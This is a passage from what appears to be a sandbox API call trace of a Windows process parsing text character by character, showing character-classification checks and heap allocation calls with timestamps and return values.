(wch=0x41) returned 0 [0113.127] IsCharSpaceW (wch=0x6e) returned 0 [0113.127] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2e) returned 0x4aabf8 [0113.127] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a98a0 [0113.127] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.127] IsCharSpaceW (wch=0x3a) returned 0 [0113.127] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.127] IsCharSpaceW (wch=0x20) returned 1 [0113.127] IsCharSpaceW (wch=0x77) returned 0 [0113.127] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.127] IsCharSpaceW (wch=0x3b) returned 0 [0113.127] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.127] IsCharSpaceW (wch=0x20) returned 1 [0113.127] IsCharSpaceW (wch=0xd) returned 1 [0113.127] IsCharSpaceW (wch=0xd) returned 1 [0113.127] IsCharSpaceW (wch=0xa) returned 1 [0113.127] IsCharSpaceW (wch=0x7d) returned 0 [0113.127] IsCharSpaceW (wch=0x65) returned 0 [0113.127] IsCharSpaceW (wch=0x77) returned 0 [0113.127] IsCharSpaceW (wch=0x77) returned 0 [0113.127] IsCharSpaceW (wch=0x65) returned 0 [0113.128] IsCharAlphaW (ch=0x77) returned 1 [0113.128] IsCharAlphaW (ch=0x68) returned 1 [0113.128] IsCharAlphaW (ch=0x69) returned 1 [0113.128] IsCharAlphaW (ch=0x74) returned 1 [0113.128] IsCharAlphaW (ch=0x65) returned 1 [0113.128] bsearch (_Key=0x22f0e0, _Base=0x73d14c80, _NumOfElements=0x93, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x73d150f8 [0113.128] IsCharSpaceW (wch=0x77) returned 0 [0113.128] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a98a0, Size=0x90) returned 0x4c1170 [0113.128] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.128] IsCharSpaceW (wch=0xd) returned 1 [0113.128] IsCharSpaceW (wch=0xd) returned 1 [0113.128] IsCharSpaceW (wch=0xa) returned 1 [0113.128] IsCharSpaceW (wch=0xd) returned 1 [0113.128] IsCharSpaceW (wch=0xd) returned 1 [0113.128] IsCharSpaceW (wch=0xa) returned 1 [0113.128] IsCharSpaceW (wch=0x7d) returned 0 [0113.128] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.128] IsCharSpaceW (wch=0x20) returned 1 [0113.128] IsCharSpaceW (wch=0xd) returned 1 [0113.128] IsCharSpaceW (wch=0xd) returned 1 [0113.128] IsCharSpaceW (wch=0xa) returned 1 [0113.129] IsCharSpaceW (wch=0x20) returned 1 [0113.129] IsCharSpaceW (wch=0x70) returned 0 [0113.129] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.129] IsCharSpaceW (wch=0x2c) returned 0 [0113.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd3b8 [0113.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.129] IsCharSpaceW (wch=0x70) returned 0 [0113.129] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.129] IsCharSpaceW (wch=0x20) returned 1 [0113.129] IsCharSpaceW (wch=0x75) returned 0 [0113.129] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.129] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.129] IsCharSpaceW (wch=0x2c) returned 0 [0113.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd3d8 [0113.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.129] IsCharSpaceW (wch=0x6c) returned 0 [0113.129] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.129] IsCharSpaceW (wch=0x20) returned 1 [0113.129] IsCharSpaceW (wch=0x6f) returned 0 [0113.129] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.129] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.129] IsCharSpaceW (wch=0x2c) returned 0 [0113.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd3f8 [0113.129] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.129] IsCharSpaceW (wch=0x6c) returned 0 [0113.129] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.129] IsCharSpaceW (wch=0x20) returned 1 [0113.129] IsCharSpaceW (wch=0x6c) returned 0 [0113.129] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.129] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.130] IsCharSpaceW (wch=0x20) returned 1 [0113.130] IsCharSpaceW (wch=0x7b) returned 0 [0113.130] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd418 [0113.130] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.130] IsCharSpaceW (wch=0x20) returned 1 [0113.130] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.130] IsCharSpaceW (wch=0xd) returned 1 [0113.130] IsCharSpaceW (wch=0xd) returned 1 [0113.130] IsCharSpaceW (wch=0xa) returned 1 [0113.130] IsCharSpaceW (wch=0x20) returned 1 [0113.130] IsCharSpaceW (wch=0x66) returned 0 [0113.130] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.130] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.130] IsCharSpaceW (wch=0x20) returned 1 [0113.130] IsCharSpaceW (wch=0x3a) returned 0 [0113.130] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba930 [0113.130] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.130] IsCharSpaceW (wch=0x20) returned 1 [0113.130] IsCharSpaceW (wch=0x31) returned 0 [0113.130] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.130] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.130] IsCharSpaceW (wch=0x20) returned 1 [0113.130] IsCharSpaceW (wch=0x41) returned 0 [0113.130] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.130] IsCharSpaceW (wch=0x2c) returned 0 [0113.130] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.130] IsCharSpaceW (wch=0x67) returned 0 [0113.130] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.130] IsCharSpaceW (wch=0x2c) returned 0 [0113.130] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.131] IsCharSpaceW (wch=0x68) returned 0 [0113.131] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.131] IsCharSpaceW (wch=0x3b) returned 0 [0113.131] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.131] IsCharSpaceW (wch=0xd) returned 1 [0113.131] IsCharSpaceW (wch=0xd) returned 1 [0113.131] IsCharSpaceW (wch=0xa) returned 1 [0113.131] IsCharSpaceW (wch=0x20) returned 1 [0113.131] IsCharSpaceW (wch=0x7d) returned 0 [0113.131] IsCharSpaceW (wch=0x61) returned 0 [0113.131] IsCharSpaceW (wch=0x31) returned 0 [0113.131] IsCharSpaceW (wch=0x31) returned 0 [0113.131] IsCharSpaceW (wch=0x61) returned 0 [0113.131] bsearch (_Key=0x22f03c, _Base=0x73d35220, _NumOfElements=0x9, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x0 [0113.131] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x38) returned 0x48ec90 [0113.131] IsCharSpaceW (wch=0x31) returned 0 [0113.131] IsCharSpaceW (wch=0x31) returned 0 [0113.131] IsCharSpaceW (wch=0x32) returned 0 [0113.131] IsCharSpaceW (wch=0x70) returned 0 [0113.131] IsCharSpaceW (wch=0x74) returned 0 [0113.131] IsCharSpaceW (wch=0x20) returned 1 [0113.131] IsCharSpaceW (wch=0x31) returned 0 [0113.131] IsCharSpaceW (wch=0x70) returned 0 [0113.132] IsCharSpaceW (wch=0x31) returned 0 [0113.132] IsCharSpaceW (wch=0x70) returned 0 [0113.132] IsCharSpaceW (wch=0x74) returned 0 [0113.132] IsCharSpaceW (wch=0x0) returned 0 [0113.132] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd438 [0113.132] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab720 [0113.132] IsCharSpaceW (wch=0x20) returned 1 [0113.132] IsCharSpaceW (wch=0x41) returned 0 [0113.132] IsCharSpaceW (wch=0x6e) returned 0 [0113.132] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a98a0 [0113.132] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.132] IsCharSpaceW (wch=0xd) returned 1 [0113.132] IsCharSpaceW (wch=0xd) returned 1 [0113.132] IsCharSpaceW (wch=0xa) returned 1 [0113.132] IsCharSpaceW (wch=0x20) returned 1 [0113.132] IsCharSpaceW (wch=0x68) returned 0 [0113.132] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4b9ff8, Size=0x18) returned 0x4bd458 [0113.132] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9ff8 [0113.132] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba958 [0113.132] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd478 [0113.133] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x60) returned 0x4a9908 [0113.133] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2e) returned 0x4aac68 [0113.133] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4bd458, Size=0x24) returned 0x4c01c0 [0113.133] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4ba058 [0113.133] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba9a8 [0113.133] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd458 [0113.133] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x60) returned 0x4a99d8 [0113.133] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2e) returned 0x4aacd8 [0113.133] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.133] IsCharSpaceW (wch=0x20) returned 1 [0113.133] IsCharSpaceW (wch=0x7b) returned 0 [0113.133] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd4b8 [0113.133] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.133] IsCharSpaceW (wch=0x20) returned 1 [0113.133] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.133] IsCharSpaceW (wch=0xd) returned 1 [0113.133] IsCharSpaceW (wch=0xd) returned 1 [0113.133] IsCharSpaceW (wch=0xa) returned 1 [0113.133] IsCharSpaceW (wch=0x20) returned 1 [0113.133] IsCharSpaceW (wch=0x66) returned 0 [0113.133] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.133] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.133] IsCharSpaceW (wch=0x20) returned 1 [0113.133] IsCharSpaceW (wch=0x3a) returned 0 [0113.134] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba9d0 [0113.134] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.134] IsCharSpaceW (wch=0x20) returned 1 [0113.134] IsCharSpaceW (wch=0x62) returned 0 [0113.134] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.134] IsCharSpaceW (wch=0x20) returned 1 [0113.134] IsCharSpaceW (wch=0x31) returned 0 [0113.137] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.137] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.137] IsCharSpaceW (wch=0x20) returned 1 [0113.137] IsCharSpaceW (wch=0x41) returned 0 [0113.137] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.137] IsCharSpaceW (wch=0x2c) returned 0 [0113.137] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.137] IsCharSpaceW (wch=0x20) returned 1 [0113.137] IsCharSpaceW (wch=0x48) returned 0 [0113.137] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.138] IsCharSpaceW (wch=0x2c) returned 0 [0113.138] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.138] IsCharSpaceW (wch=0x20) returned 1 [0113.138] IsCharSpaceW (wch=0x67) returned 0 [0113.138] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.138] IsCharSpaceW (wch=0x3b) returned 0 [0113.138] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.138] IsCharSpaceW (wch=0xd) returned 1 [0113.138] IsCharSpaceW (wch=0xd) returned 1 [0113.138] IsCharSpaceW (wch=0xa) returned 1 [0113.138] IsCharSpaceW (wch=0x20) returned 1 [0113.138] IsCharSpaceW (wch=0x7d) returned 0 [0113.138] IsCharSpaceW (wch=0x61) returned 0 [0113.138] IsCharSpaceW (wch=0x62) returned 0 [0113.138] IsCharSpaceW (wch=0x62) returned 0 [0113.138] IsCharSpaceW (wch=0x61) returned 0 [0113.138] bsearch (_Key=0x22f03c, _Base=0x73d35220, _NumOfElements=0x9, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x0 [0113.138] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x46) returned 0x4ac4f0 [0113.138] IsCharSpaceW (wch=0x62) returned 0 [0113.138] IsCharSpaceW (wch=0x62) returned 0 [0113.138] IsCharSpaceW (wch=0x6f) returned 0 [0113.138] IsCharSpaceW (wch=0x6c) returned 0 [0113.138] IsCharSpaceW (wch=0x64) returned 0 [0113.138] IsCharSpaceW (wch=0x20) returned 1 [0113.138] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd4d8 [0113.138] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab720 [0113.138] IsCharSpaceW (wch=0x31) returned 0 [0113.138] IsCharSpaceW (wch=0x31) returned 0 [0113.139] IsCharSpaceW (wch=0x37) returned 0 [0113.139] IsCharSpaceW (wch=0x70) returned 0 [0113.139] IsCharSpaceW (wch=0x74) returned 0 [0113.139] IsCharSpaceW (wch=0x20) returned 1 [0113.139] IsCharSpaceW (wch=0x31) returned 0 [0113.139] IsCharSpaceW (wch=0x70) returned 0 [0113.139] IsCharSpaceW (wch=0x31) returned 0 [0113.139] IsCharSpaceW (wch=0x70) returned 0 [0113.139] IsCharSpaceW (wch=0x74) returned 0 [0113.139] IsCharSpaceW (wch=0x0) returned 0 [0113.139] IsCharSpaceW (wch=0x20) returned 1 [0113.139] IsCharSpaceW (wch=0x41) returned 0 [0113.139] IsCharSpaceW (wch=0x6e) returned 0 [0113.139] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a9a40 [0113.139] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.139] IsCharSpaceW (wch=0xd) returned 1 [0113.139] IsCharSpaceW (wch=0xd) returned 1 [0113.139] IsCharSpaceW (wch=0xa) returned 1 [0113.139] IsCharSpaceW (wch=0x20) returned 1 [0113.139] IsCharSpaceW (wch=0x68) returned 0 [0113.139] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4ba088 [0113.139] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.139] IsCharSpaceW (wch=0x20) returned 1 [0113.139] IsCharSpaceW (wch=0x7b) returned 0 [0113.139] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd4f8 [0113.139] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.139] IsCharSpaceW (wch=0x20) returned 1 [0113.139] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.139] IsCharSpaceW (wch=0xd) returned 1 [0113.140] IsCharSpaceW (wch=0xd) returned 1 [0113.140] IsCharSpaceW (wch=0xa) returned 1 [0113.140] IsCharSpaceW (wch=0x20) returned 1 [0113.140] IsCharSpaceW (wch=0x66) returned 0 [0113.140] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.140] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.140] IsCharSpaceW (wch=0x20) returned 1 [0113.140] IsCharSpaceW (wch=0x3a) returned 0 [0113.140] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba9f8 [0113.140] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.140] IsCharSpaceW (wch=0x20) returned 1 [0113.140] IsCharSpaceW (wch=0x62) returned 0 [0113.140] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.140] IsCharSpaceW (wch=0x20) returned 1 [0113.140] IsCharSpaceW (wch=0x31) returned 0 [0113.140] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.140] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.140] IsCharSpaceW (wch=0x20) returned 1 [0113.140] IsCharSpaceW (wch=0x41) returned 0 [0113.140] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.140] IsCharSpaceW (wch=0x2c) returned 0 [0113.140] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.140] IsCharSpaceW (wch=0x20) returned 1 [0113.140] IsCharSpaceW (wch=0x48) returned 0 [0113.140] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.140] IsCharSpaceW (wch=0x2c) returned 0 [0113.140] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.140] IsCharSpaceW (wch=0x20) returned 1 [0113.140] IsCharSpaceW (wch=0x67) returned 0 [0113.140] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.140] IsCharSpaceW (wch=0x3b) returned 0 [0113.140] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.140] IsCharSpaceW (wch=0xd) returned 1 [0113.140] IsCharSpaceW (wch=0xd) returned 1 [0113.141] IsCharSpaceW (wch=0xa) returned 1 [0113.141] IsCharSpaceW (wch=0x20) returned 1 [0113.141] IsCharSpaceW (wch=0x7d) returned 0 [0113.141] IsCharSpaceW (wch=0x61) returned 0 [0113.141] IsCharSpaceW (wch=0x62) returned 0 [0113.141] IsCharSpaceW (wch=0x62) returned 0 [0113.141] IsCharSpaceW (wch=0x61) returned 0 [0113.141] bsearch (_Key=0x22f03c, _Base=0x73d35220, _NumOfElements=0x9, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x0 [0113.141] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x46) returned 0x4ac4f0 [0113.141] IsCharSpaceW (wch=0x62) returned 0 [0113.141] IsCharSpaceW (wch=0x62) returned 0 [0113.141] IsCharSpaceW (wch=0x6f) returned 0 [0113.141] IsCharSpaceW (wch=0x6c) returned 0 [0113.141] IsCharSpaceW (wch=0x64) returned 0 [0113.141] IsCharSpaceW (wch=0x20) returned 1 [0113.141] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd518 [0113.141] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab720 [0113.141] IsCharSpaceW (wch=0x31) returned 0 [0113.141] IsCharSpaceW (wch=0x31) returned 0 [0113.141] IsCharSpaceW (wch=0x32) returned 0 [0113.141] IsCharSpaceW (wch=0x70) returned 0 [0113.141] IsCharSpaceW (wch=0x74) returned 0 [0113.141] IsCharSpaceW (wch=0x20) returned 1 [0113.141] IsCharSpaceW (wch=0x31) returned 0 [0113.141] IsCharSpaceW (wch=0x70) returned 0 [0113.141] IsCharSpaceW (wch=0x31) returned 0 [0113.141] IsCharSpaceW (wch=0x70) returned 0 [0113.141] IsCharSpaceW (wch=0x74) returned 0 [0113.141] IsCharSpaceW (wch=0x0) returned 0 [0113.141] IsCharSpaceW (wch=0x20) returned 1 [0113.141] IsCharSpaceW (wch=0x41) returned 0 [0113.142] IsCharSpaceW (wch=0x6e) returned 0 [0113.142] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a9aa8 [0113.142] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.142] IsCharSpaceW (wch=0xd) returned 1 [0113.142] IsCharSpaceW (wch=0xd) returned 1 [0113.142] IsCharSpaceW (wch=0xa) returned 1 [0113.142] IsCharSpaceW (wch=0x20) returned 1 [0113.142] IsCharSpaceW (wch=0x23) returned 0 [0113.142] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c01c0, Size=0x34) returned 0x48ed10 [0113.142] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4ba0a0 [0113.142] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.142] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd538 [0113.142] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.142] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.142] IsCharSpaceW (wch=0x20) returned 1 [0113.142] IsCharSpaceW (wch=0x7b) returned 0 [0113.142] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1a) returned 0x4baa20 [0113.142] IsCharSpaceW (wch=0x20) returned 1 [0113.142] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.142] IsCharSpaceW (wch=0xd) returned 1 [0113.142] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.142] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.142] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.142] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.142] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.143] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x32) returned 1 [0113.143] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.143] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.143] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.143] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a9b10 [0113.143] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.143] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.144] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.144] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a9b10, Size=0x90) returned 0x4c1208 [0113.144] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.144] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.144] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.144] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c1208, Size=0xd0) returned 0x4c1208 [0113.144] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.145] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd578 [0113.145] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.145] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.145] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.146] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.146] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.146] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.146] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a9b10 [0113.146] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.146] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.146] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.146] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x32) returned 1 [0113.146] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.146] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.150] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a9b10, Size=0x90) returned 0x4c2118 [0113.150] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.150] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.151] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.151] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c2118, Size=0xd0) returned 0x4c2118 [0113.151] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x33) returned 1 [0113.151] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.151] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c2118, Size=0x130) returned 0x4c2118 [0113.151] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.151] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.151] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd5b8 [0113.151] RtlAllocateHeap 